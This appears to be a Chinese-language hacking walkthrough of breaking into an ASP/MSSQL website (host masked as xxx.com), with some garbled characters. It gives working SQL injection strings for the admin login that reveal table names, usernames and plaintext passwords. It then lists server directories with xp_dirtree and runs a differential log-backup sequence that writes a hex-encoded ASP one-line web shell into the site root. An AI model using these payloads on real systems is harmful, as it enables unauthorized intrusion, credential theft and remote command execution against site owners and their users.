看來(lái)有點(diǎn)防范啊，為了確定是否是防注入系統(tǒng)，如果是的話，我們就可以試試cookie注入了，于是，我換個(gè)方法檢測(cè)了下，就是
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65&MainBcgID=102-0
在數(shù)字后加上減0，回車，彈出相同的提示對(duì)話框，分別提交
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65-0&MainBcgID=102
http://www.xxx.com/kssz.asp?BcgID=104-0&ThatBcgID=65&MainBcgID=102
都是相同的提示，看來(lái)是程序過濾了，非防注入。
然后我就打開Google，搜索了下帶有asp?id=的鏈接，結(jié)果都是一樣，那注入就沒戲了。
接下來(lái)，俺就拿出自己寫的掃描工具掃描了下常見上傳點(diǎn)，也沒有發(fā)現(xiàn)，看來(lái)，只能向后臺(tái)輸入框進(jìn)軍了哈。
在后臺(tái)輸入一個(gè)單引號(hào)，隨便輸入密碼，回車，報(bào)錯(cuò)了，哈

看來(lái)朋友說(shuō)的沒錯(cuò)，有戲啊，而且是mssql的，幸虧是mssql的，不然還拿不下呢(原因，后面會(huì)提到)
接著，按照常規(guī)步驟，開始注入了,但是俺是懶人,想偷點(diǎn)懶,于是抓包,想通過get方式來(lái)注入,這樣可以讓工具來(lái)代替人力啊,哈哈,

于是,組合下內(nèi)容
www.xxx.com/login/default.asp?Submit=%B5%C7+%C2%BC&Userpwd=1& Username=1
可是老天就是不配合俺,這個(gè)方法在這里不行啊。哎，看來(lái)只能手工了，這個(gè)對(duì)俺來(lái)說(shuō)相當(dāng)痛苦了。
米辦法，老實(shí)的一步一步來(lái)了。在輸入框里輸入’ having 1=1 and ‘’=’ 回車，報(bào)錯(cuò)

嘻嘻，我得意的笑，這里，我們得到了表名和字段名，繼續(xù)爆，輸入’group by user_info.user_id having 1=1 and ‘’=’

爆出了user_name，繼續(xù)爆，’group by user_info.user_id ,user_info.user_name having 1=1 and ‘’=’

到這里就差不多了，我們要的關(guān)鍵字段都有了，表名也有了，該是爆內(nèi)容了，輸入

’and 1=(select user_name from user_info) and ‘’=’ 爆出了用戶名

然后用相同方法，輸入’and 1=(select user_pwd from user_info) and ‘’=’ 爆出了密碼,哈哈發(fā)現(xiàn)密碼還是不加密的，那就更好了。
直接拿起密碼進(jìn)入后臺(tái)

以為接下來(lái)就容易拿到shell了，隨便找了一個(gè)上傳點(diǎn)，試了下直接傳，提示成功，哈哈，開心了，心道，今天rp不錯(cuò)的嘛，剛剛在手工那里費(fèi)了點(diǎn)時(shí)間，現(xiàn)在剛剛補(bǔ)回來(lái)了，直接拿到shell了，于是拿著地址去打開，結(jié)果，當(dāng)場(chǎng)吐血，為啥，因?yàn)樯蟼髀窂降奈募�夾不讓執(zhí)行腳本啊

心里大罵這個(gè)管理員，shit，shit，shit他JJ，讓老子白高興一場(chǎng)。找了下其他圖片的文件夾路徑，都是一樣，不讓執(zhí)行腳本。哎，蒼天那，大地啊，你怎么可以這樣對(duì)我啊。以為沒辦法那shell了，準(zhǔn)備放棄了，和朋友一說(shuō)，他說(shuō)，是不是可以在后臺(tái)進(jìn)行差異備份拿shell呢，我一聽，一拍大腿，對(duì)啊，MMB，我怎么沒想到，哎，居然把后臺(tái)的注入點(diǎn)是mssql這茬給忘了，鄙視下自己。
要差異備份首先要知道站點(diǎn)，哎，俺最頭痛的手工又要開始了，話說(shuō)到這里，插一句話，希望各位一定要好好學(xué)習(xí)sql哦，工具是死的，人是活的，手工厲害啊，雖然麻煩(觀眾：又開始裝逼了，小心出門被雷劈啊…..我：哈哈，俺不怕，俺是絕緣體，沒事沒事…..忽然，天空一陣巨響，小影子被雷劈了。。。55555555，今天沒看黃歷啊)
開始猜路徑了，過程是：建立一個(gè)表，通過xp_dirtree組件，把列出來(lái)的內(nèi)容插入臨時(shí)表，然后我們?cè)谝粋�(gè)一個(gè)把內(nèi)容從臨時(shí)表里讀出來(lái)。
首先，我們建立一個(gè)表，輸入’ create talbe tmp(id int identity(1,1),path varchar(255),depth int,isfile int ) and ‘’=’
然后，我們要確認(rèn)下我們的表是否建立成功了，不然如果不成功的話，我們后面做的都是無(wú)用功了，哈。輸入’ select * from tmp having 1=1 and ‘’=’，報(bào)錯(cuò)了，說(shuō)明建表成功

接下來(lái)，就是插入內(nèi)容了
‘insert into tmp exec master.dbo.xp_dirtree ‘d:\’,1,1 and ‘’=’
接著，就可以列目錄了，輸入
‘ and 1=(select path from tmp where id=N) and ‘’=’ (N=1,2,3,4,5，……)
就列出了路徑

改變N的值就可以列出了，重復(fù)過程就不寫了，最后知道路徑是D:\website\xxx.com\
接下來(lái)就是進(jìn)行差異備份了，在輸入框輸入一次輸入差異備份語(yǔ)句
'alter database hz3yy set RECOVERY FULL--
'Drop table [banlg];create table [dbo].[banlg] ([cmd] [image])--
'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737335393536 backup log @a to disk=@s with init--
'insert into banlg(cmd) values(0x3C256578656375746528726571756573742822636D64222929253E)--
'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C776562736974655C687A3379792E636F6D5C772E617370 backup log @a to disk=@s--
'Drop table [banlg]—

然后輸入網(wǎng)址，輸入http://www.xxx.com/ww.asp,熟悉的亂碼界面出現(xiàn)了，哈哈，然后就是傳shell了，圖就不截了，嘻嘻。